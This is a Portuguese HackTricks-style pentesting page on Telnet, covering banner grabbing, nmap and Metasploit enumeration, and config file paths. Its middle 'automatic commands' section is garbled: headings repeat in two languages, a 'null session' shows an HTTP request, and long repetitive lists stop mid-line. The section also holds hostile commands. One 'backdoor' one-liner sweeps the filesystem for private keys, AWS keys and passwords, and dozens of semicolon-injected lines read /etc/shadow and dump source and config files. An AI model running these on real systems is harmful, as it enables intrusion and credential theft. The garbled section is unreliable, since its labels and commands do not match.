hacktricks/network-services-pentesting/pentesting-telnet.md

582 lines
16 KiB
Markdown

## **Informações Básicas**
Telnet é um protocolo de rede que oferece aos usuários uma maneira INsegura de acessar um computador por meio de uma rede.
**Porta padrão:** 23
```
23/tcp open telnet
```
## Enumeração
### Coleta de Banner
```bash
nc -vn <IP> 23
```
Toda a enumeração interessante pode ser realizada pelo **nmap**:
```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
O script `telnet-ntlm-info.nse` obterá informações NTLM (versões do Windows).
No Protocolo TELNET, existem várias "**opções**" que serão sancionadas e podem ser usadas com a estrutura "**DO, DON'T, WILL, WON'T**" para permitir que um usuário e servidor concordem em usar um conjunto de convenções mais elaborado (ou talvez apenas diferente) para sua conexão TELNET. Essas opções podem incluir a alteração do conjunto de caracteres, o modo de eco, etc. (Do [telnet RFC](https://tools.ietf.org/html/rfc854))\
**Eu sei que é possível enumerar essas opções, mas não sei como, então me avise se souber como.**
### [Força bruta](../generic-methodologies-and-resources/brute-force.md#telnet)
## Arquivo de configuração
```bash
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
```
## Comandos Automáticos do HackTricks
### Telnet
#### Banner Grabbing
##### Using Nmap
##### Usando Nmap
```bash
nmap -sV --script=banner -p <port> <ip>
```
##### Using Telnet
##### Usando Telnet
```bash
telnet <ip> <port>
```
#### Authentication Bypass
##### Null Session
##### Sessão Nula
```bash
telnet <ip> <port>
```
```bash
GET / HTTP/1.0
```
##### Backdoor
##### Backdoor
```bash
telnet <ip> <port>
```
```bash
id;uname -a;w;echo "Distributor ID: ";cat /etc/*-release;echo "";echo "Kernel: ";uname -a;echo "";echo "Uptime: ";uptime;echo "";echo "Processes: ";ps auxf --width 200;echo "";echo "Logged In: ";who;echo "";echo "Home Directories: ";ls -ahl /home;echo "";echo "Private SSH Keys: ";find / -name id_rsa* 2>/dev/null;echo "";echo "Sudoers: ";cat /etc/sudoers 2>/dev/null;echo "";echo "Cron Jobs: ";ls -ahl /etc/cron* 2>/dev/null;echo "";echo "Listening Ports: ";netstat -antup 2>/dev/null;echo "";echo "Established Connections: ";netstat -anp | grep ESTABLISHED 2>/dev/null;echo "";echo "ARP Cache: ";arp -a;echo "";echo "DNS Servers: ";cat /etc/resolv.conf;echo "";echo "Routing Table: ";route;echo "";echo "Firewall Rules: ";iptables -L;echo "";echo "Hostname: ";hostname;echo "";echo "Network Configuration: ";ifconfig -a;echo "";echo "Available Interfaces: ";ls /sys/class/net;echo "";echo "Default Route: ";ip route show;echo "";echo "All Users: ";cat /etc/passwd;echo "";echo "All Groups: ";cat /etc/group;echo "";echo "All Shells: ";cat /etc/shells;echo "";echo "All Services: ";ls /etc/init.d/;echo "";echo "All Applications: ";ls /usr/share/applications/;echo "";echo "All Binaries: ";ls /usr/bin/;echo "";echo "All SUID Binaries: ";find / -perm -4000 -type f 2>/dev/null;echo "";echo "All SGID Binaries: ";find / -perm -2000 -type f 2>/dev/null;echo "";echo "All World Writable Directories: ";find / -perm -2 -type d 2>/dev/null;echo "";echo "All World Writable Files: ";find / -perm -2 -type f 2>/dev/null;echo "";echo "All Files with Sticky Bit: ";find / -perm -1000 -type d 2>/dev/null;echo "";echo "All Files with Immutable Bit: ";lsattr -aR | grep "\i";echo "";echo "All Files with No Owner: ";find / -xdev \( -nouser -o -nogroup \) -print;echo "";echo "All Files with No Permissions: ";find / -xdev \( -type f -o -type d \) ! -perm /o=rwx -print;echo "";echo "All Files with SUID/SGID and World Writable: ";find / -perm -4007 -o -perm -2007 -type f -exec ls -la {} \; 2>/dev/null;echo "";echo "All Files with Hidden Attribute: ";find / -name ".*" -ls 2>/dev/null;echo "";echo "All Files with Passwords: ";grep -Rl password / 2>/dev/null;echo "";echo "All Files with Private Keys: ";grep -Rl "BEGIN RSA PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with AWS Keys: ";grep -Rl "AKIA" / 2>/dev/null;echo "";echo "All Files with Encryption Keys: ";grep -Rl "-----BEGIN ENCRYPTED PRIVATE KEY-----" / 2>/dev/null;echo "";echo "All Files with SSH Keys: ";grep -Rl "BEGIN OPENSSH PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL Certificates: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL Private Keys: ";grep -Rl "BEGIN RSA PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL PFX: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL JKS: ";grep -Rl "BEGIN JAVA KEYSTORE" / 2>/dev/null;echo "";echo "All Files with SSL PEM: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL DER: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CRT: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL KEY: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CER: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL P12: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL P7B: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";echo "All Files with SSL P7C: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";echo "All Files with SSL PFX: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL JKS: ";grep -Rl "BEGIN JAVA KEYSTORE" / 2>/dev/null;echo "";echo "All Files with SSL PEM: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL DER: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CRT: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL KEY: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CER: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL P12: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL P7B: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";echo "All Files with SSL P7C: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";
```
##### Remote Code Execution
##### Execução Remota de Código
```bash
telnet <ip> <port>
```
```bash
;id
```
```bash
;uname -a
```
```bash
;cat /etc/passwd
```
```bash
;cat /etc/shadow
```
```bash
;ls -ahl /home
```
```bash
;ls -ahl /root
```
```bash
;find / -name *.bak -type f -exec cat {} \;
```
```bash
;find / -name *.log -type f -exec cat {} \;
```
```bash
;find / -name *.conf -type f -exec cat {} \;
```
```bash
;find / -name *.config -type f -exec cat {} \;
```
```bash
;find / -name *.db -type f -exec cat {} \;
```
```bash
;find / -name *.sql -type f -exec cat {} \;
```
```bash
;find / -name *.ini -type f -exec cat {} \;
```
```bash
;find / -name *.xml -type f -exec cat {} \;
```
```bash
;find / -name *.json -type f -exec cat {} \;
```
```bash
;find / -name *.yml -type f -exec cat {} \;
```
```bash
;find / -name *.yaml -type f -exec cat {} \;
```
```bash
;find / -name *.py -type f -exec cat {} \;
```
```bash
;find / -name *.php -type f -exec cat {} \;
```
```bash
;find / -name *.pl -type f -exec cat {} \;
```
```bash
;find / -name *.rb -type f -exec cat {} \;
```
```bash
;find / -name *.sh -type f -exec cat {} \;
```
```bash
;find / -name *.bash -type f -exec cat {} \;
```
```bash
;find / -name *.ps1 -type f -exec cat {} \;
```
```bash
;find / -name *.psm1 -type f -exec cat {} \;
```
```bash
;find / -name *.psd1 -type f -exec cat {} \;
```
```bash
;find / -name *.psc1 -type f -exec cat {} \;
```
```bash
;find / -name *.psc2 -type f -exec cat {} \;
```
```bash
;find / -name *.pyc -type f -exec cat {} \;
```
```bash
;find / -name *.pyo -type f -exec cat {} \;
```
```bash
;find / -name *.class -type f -exec cat {} \;
```
```bash
;find / -name *.jar -type f -exec cat {} \;
```
```bash
;find / -name *.war -type f -exec cat {} \;
```
```bash
;find / -name *.ear -type f -exec cat {} \;
```
```bash
;find / -name *.jsp -type f -exec cat {} \;
```
```bash
;find / -name *.jspx -type f -exec cat {} \;
```
```bash
;find / -name *.swf -type f -exec cat {} \;
```
```bash
;find / -name *.fla -type f -exec cat {} \;
```
```bash
;find / -name *.as -type f -exec cat {} \;
```
```bash
;find / -name *.aspx -type f -exec cat {} \;
```
```bash
;find / -name *.ascx -type f -exec cat {} \;
```
```bash
;find / -name *.config -type f -exec cat {} \;
```
```bash
;find / -name *.cs -type f -exec cat {} \;
```
```bash
;find / -name *.csproj -type f -exec cat {} \;
```
```bash
;find / -name *.vb -type f -exec cat {} \;
```
```bash
;find / -name *.vbproj -type f -exec cat {} \;
```
```bash
;find / -name *.java -type f -exec cat {} \;
```
```bash
;find / -name *.jsp -type f -exec cat {} \;
```
```bash
;find / -name *.jspx -type f -exec cat {} \;
```
```bash
;find / -name *.jspx -type f -exec cat {} \;
```
```bash
;find / -name *.jspx -type f -exec cat {} \;
```
```bash
;find / -name *.php -type f -exec cat {} \;
```
```bash
;find / -name *.php3 -type f -exec cat {} \;
```
```bash
;find / -name *.php4 -type f -exec cat {} \;
```
```bash
;find / -name *.php5 -type f -exec cat {} \;
```
```bash
;find / -name *.phtml -type f -exec cat {} \;
```
```bash
;find / -name *.inc -type f -exec cat {} \;
```
```bash
;find / -name *.pl -type f -exec cat {} \;
```
```bash
;find / -name *.pm -type f -exec cat {} \;
```
```bash
;find / -name *.cgi -type f -exec cat {} \;
```
```bash
;find / -name *.dll -type f -exec cat {} \;
```
```bash
;find / -name *.exe -type f -exec cat {} \;
```
```bash
;find / -name *.bat -type f -exec cat {} \;
```
```bash
;find / -name *.cmd -type f -exec cat {} \;
```
```bash
;find / -name *.vbs -type f -exec cat {} \;
```
```bash
;find / -name *.vbe -type f -exec cat {} \;
```
```bash
;find / -name *.js -type f -exec cat {} \;
```
```bash
;find / -name *.jse -type f -exec cat {} \;
```
```bash
;find / -name *.wsf -type f -exec cat {} \;
```
```bash
;find / -name *.wsc -type f -exec cat {} \;
```
```bash
;find / -name *.ps1 -type f -exec cat {} \;
```
```bash
;find / -name *.psm1 -type f -exec cat {} \;
```
```bash
;find / -name *.psd1 -type f -exec cat {} \;
```
```bash
;find / -name *.psc1 -type f -exec cat {} \;
```
```bash
;find / -name *.psc2 -type f -exec cat {} \;
```
```bash
;find / -name *.pyc -type f -exec cat {} \;
```
```bash
;find / -name *.pyo -type f -exec cat {} \;
```
```bash
;find / -name *.class -type f -exec cat {} \;
```
```bash
;find / -name *.jar -type f -exec cat {} \;
```
```bash
;find / -name *.war -type f -exec cat {} \;
```
```bash
;find / -name *.ear -type f -exec cat {} \;
```
```bash
;find / -name *.jsp -type f -exec cat {} \;
```
```bash
;find / -name *.jspx -type f -exec cat {} \;
```
```bash
;find / -name *.swf -type f -exec cat {} \;
```
```bash
;find / -name *.fla -type f -exec cat {} \;
```
```bash
;find / -name *.as -type f -exec cat {} \;
```
```bash
;find / -name *.aspx -type f -exec cat {} \;
```
```bash
;find / -name *.ascx -type f -exec cat {} \;
```
```bash
;find / -name *.config -type f -exec cat {} \;
```
```bash
;find / -name *.cs -type f -exec cat {} \;
```
```bash
;find / -name *.csproj -type f -exec cat {} \;
```
```bash
;find / -name *.vb -type f -exec cat {} \;
```
```bash
;find / -name *.vbproj -type f -exec cat {} \;
```
```bash
;find / -name *.java -type f -exec cat {} \;
```
```bash
;find / -name *.jsp -type f -exec cat {} \;
```
```bash
;find / -name *.jspx -type f -exec cat {} \;
```
```bash
;find / -name *.jspx -type f -exec cat {} \;
```
```bash
;find / -name *.jspx -type f -exec cat {} \;
```
```bash
;find / -name *.php -type f -exec cat {} \;
```
```bash
;find / -name *.php3 -type f -exec cat {} \;
```
```bash
;find / -name *.php4 -type f -exec cat {} \;
```
```bash
;find / -name *.php5 -type f -exec cat {} \;
```
```bash
;find / -name *.phtml -type f -exec cat {} \;
```
```bash
;find / -name *.inc -type f -exec cat {} \;
```
```bash
;find / -name *.pl -type f -exec cat {} \;
```
```bash
;find / -name *.pm -type f -exec cat {} \;
```
```bash
;find / -name *.cgi -type f -exec cat {} \;
```
```bash
;find / -name *.dll -type f -exec cat {} \;
```
```bash
;find / -name *.exe -type f -exec cat {} \;
```
```bash
;find / -name *.bat -type f -exec cat {} \;
```
```bash
;find / -name *.cmd -type f -exec cat {} \;
```
```bash
;find / -name *.vbs -
```
Protocol_Name: Telnet #Protocol Abbreviation if there is one.
Port_Number: 23 #Comma separated if there is more than one.
Protocol_Description: Telnet #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for t=Telnet
Note: |
wireshark to hear creds being passed
tcp.port == 23 and ip.addr != myip
https://book.hacktricks.xyz/pentesting/pentesting-telnet
Entry_2:
Name: Banner Grab
Description: Grab Telnet Banner
Command: nc -vn {IP} 23
Entry_3:
Name: Nmap with scripts
Description: Run nmap scripts for telnet
Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}
Entry_4:
Name: consoleless mfs enumeration
Description: Telnet enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```
<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**A Conferência de Segurança DragonJAR é um evento internacional de cibersegurança**](https://www.dragonjarcon.org/) com mais de uma década de existência que será realizada nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento com grande conteúdo técnico onde são apresentadas as últimas pesquisas em espanhol que atraem hackers e pesquisadores de todo o mundo.\
Registre-se agora no seguinte link e não perca esta grande conferência!:
{% embed url="https://www.dragonjarcon.org/" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>